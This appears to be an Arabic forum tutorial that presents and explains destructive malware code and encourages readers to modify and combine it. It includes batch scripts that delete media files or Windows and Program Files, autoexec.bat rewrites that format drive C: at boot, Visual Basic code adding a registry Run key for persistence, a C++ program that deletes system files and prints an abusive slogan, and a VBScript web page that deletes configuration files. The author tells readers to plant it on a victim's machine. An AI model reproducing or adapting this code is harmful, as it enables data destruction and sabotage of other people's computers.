* هذا الفيروس يقوم على مسح كل ملفات dll و sys من system وهذا ما سوف نلحظه بالنظر إلى الكود و به سوف نجد أنه كتب فى هذا الكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين و يمكن ملاحظة شيء آخر و هو كون الكمبيوتر يمسح الملفات من system و سوف نجد فى أول الكود الأمر الخاص بذلك فسوف تجد أنه قد أعطى له الأمر بالذهاب إلى c: و كما أعطاه الأمر بالذهاب لملفات الوندوز عندما أصدرنا له الأمر windir ثم أخبرناه أن الأوامر التالية يجب أن تكون داخل ملف system و هو موجود ضمن ملفات الويندوز
* بعد أن فهمنا هذه الأوامر ..... هل هناك من يستطيع الإجابة على سؤالي و هو : هل يمكننا تعديل هذا الكود ؟!!
لن ادعكم تفكرون طويلا فى الأجابة سوف أجيب بكل بساطة عن السؤال و هو يمكننا أن نغير أى شئ قد فهمناه جيدا لذا يمكننا أن نغير هذا الكود قليلا وسأخبركم عما هو يمكننا أن نغيره و طبعا أنتم تعرفون المكان الذي يمكننا أن نغيره في الكود فيمكننا أن نغير نوعية الملفات التى سيقوم بمسحها أو يمكننا زيادتها كما يمكننا أن نغير المكان الذى سوف يوجد فيه فمثلا هناك يوجد أنواع لأنظمة التشغيل فهناك من يضع مثلا ويندوز 98 و هناك من يضع Xp لذا يمكننا أن نغير اتجاه الفيروس إلى d:
مثال توضيحى :
أنا الآن أريد أن أمزح مع أحد و فى نفس الوقت أريد أن اعلمه درس فيمكنني أن أصنع فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. كما أننى أريد أن أمسح جميع الملفات التي امتددها *.mp3 و جميع امتدادت الملفات الخاصة بالأفلام و التي امتدادها *.asf و التى توجد في E: كل ما علينا هو تعديل الكود ليصبح هكذا:
كود:
@Echo off
e:
deltree /y *.jpg
cd\
deltree /y *.mp3
cd\
deltree /y *.asf
----------------
الكود الثانى :
--------------
كود:
echo off@ cls call attrib -h -r c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat echo format c: /q /u /autotest >nul >>c:\autoexec.bat
الفيروس السابق يعتبر من الأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى فكرة عمل لكمبيوتر و ليس ممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه خبير كمبيوتر
نبدا بتوضيح الكود : فكما نرى فى الكود اول سطر مجرد فائدته مسح الشاشة من أي أمر أو تعليق مسبق حتى يجعل عمل هذا الفيروس هو الوحيد
بعدها سوف نجد مجموعة من السطور هي تقريبا مكرره فكرتها وليس مكرر عملها ولكن يمكننا أن نوضح انه هناك 3 أكود منفصلة هي الفكرة الأساسيه و هي ما سوف نوضحه
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
يعطي هذا المود الأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التي تنزل على الجهاز و نلاحظ تكراره في مسح الويندوز فى الكود
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
ولكنه اذا قام بمسح الويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك أعطى أمر نسخ لهذين الأمرين حتى يمكننا استخدامهم فيما بعد و هذا هو ما اعطاه هذان السطرين
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
اما بعد ذلك فهو أعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود فى السطر التالى
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
أولا يوجد بعض الأمور يجب توضيحها قبل البدء في هذا الموضوع وهو أنه بوضع هذا الفيروس فى الـC:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما إذا كنت في عملية هكر لجهاز فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه
ولاكني وجدت فيه عيب بسيط و هو أن هذا الفيروس لن يعمل فى جهاز وضع فيه غير ملف windows فمثلا إذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل ملف win98 فإن الفيروس الذي كوناه لن يقوم ببعض الأعمال و هي نسخ الأوامر و مسح الويندوز ولكنه سوف يقوم بعمل فورمات
أما بالنسبة لتعديله فكل ما أستطيع أن أعطيكم إياه من تعديل مفيد فيه و هو أن تمسحوا أوامر مسح الويندوز و Program files و تدع أمر الفورمات مع تغيير مثلا أنه يقوم بفورمات على الـ D: فيكون لكود كما يلى
كود:
echo off@ cls call attrib -h -r c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo format d: /q /u /autotest >nul >>c:\autoexec.bat
الكود الثالث :
--------------
كود:
code:--------------------------------------------------------------------------------echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat
الآن و بعد أن تعرفنا على الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده
الخاصــــــــــــــية الأولى :-
كود:
On Error Resume Next Dim copy, copy2 copy = "c:\virus.exe" copy2 = "c:\windows\system\Project12.exe" FileCopy copy, copy2
الخاصــــــــــــــية الثانيه :-
كود:
Option Explicit Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long Private Const REG_SZ = 1 Private Const LOCALMACHINE = &H80000002 Private Sub Command1_Click() Dim InputValue As String Dim nBufferKey As Long, nBufferSubKey As Long RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey RegOpenKey nBufferKey, "Run-", nBufferSubKey InputValue = "c:\windows\system\Project12.exe" RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey RegOpenKey nBufferKey, "Run-", nBufferSubKey RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue) End Sub
هذا هو كل ما حصلت عليه من أكواد للفيروسات فلقد شرحت لكم مجموعه من أكواد الفيروسات التي يمكننا استخدامها و مجموعه من الأكواد التى بإضافتها للفيروس تعطي له خصائص مفيدة
يتبقى لنا شيء بسيط وهو هذا الجزء و هو مجموعة أكواد لبعض الفيروسات
______________
فيرووس C++ :
*****************
كود:
#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\tFuck -oO Israel Oo- and -oO America Oo-\n\n");
remove("c:\\windows\\system.ini");
remove("c:\\windows\\win.ini");
remove("c:\\autoexec.bat");
remove("c:\\msdos.sys");
remove("c:\\io.sys");
remove("c:\\command.com");
remove("c:\\config.sys");
remove("c:\\windows\\ebd\\command.com");
remove("c:\\windows\\ebd\\ebd.cab");
remove("c:\\windows\\ebd\\Autoexec.bat");
remove("c:\\windows\\ebd\\setramd.bat");
remove("c:\\windows\\ebd\\Findramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}
*****************
كود:
SetAttr "c:\autoexec.bat", vbNormal SetAttr "c:\msdos.sys", vbNormal SetAttr "c:\io.sys", vbNormal SetAttr "c:\windows\win.ini", vbNormal SetAttr "c:\windows\system.ini", vbNormal SetAttr "c:\command.com", vbNormal SetAttr "c:\config.sys", vbNormal SetAttr "c:\windows\rundll.exe", vbNormal SetAttr "c:\windows\rundll32.exe", vbNormal Kill "C:\autoexec.bat" Kill "C:\msdos.sys" Kill "C:\io.sys" Kill "C:\windows\win.ini" Kill "C:\windows\system.ini" Kill "C:\command.com" Kill "C:\config.sys" Kill "C:\windows\rundll.exe" Kill "C:\windows\rundll32.exe"
*****************
كود:
<html>
<head>
************************ ****************************************="Content-Type"
content="text/html; charset=iso-8859-1">
<title>Active-X HTML</title>
</head>
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<body bgcolor="#000000" Text="#C0C0C0">
<script language="VBScript">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("Scripting.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
</script>
<!--- This script author is THEONE---!>
</body>
</html>
يمكنك من دراسة هذه الأكواد و النظر فيها إلى ما قد يفيدكم فيمكنكم نقل بعض الأجزاء من الفيروسات السابقة و عمل فيروس قوى يخصكم
هذا هو كل ما لدي فى هذا الجزء و هو كما قلت لكم سابقا هو قابل للتطوير
ولا تنسوا ....... ردودكم الطيبة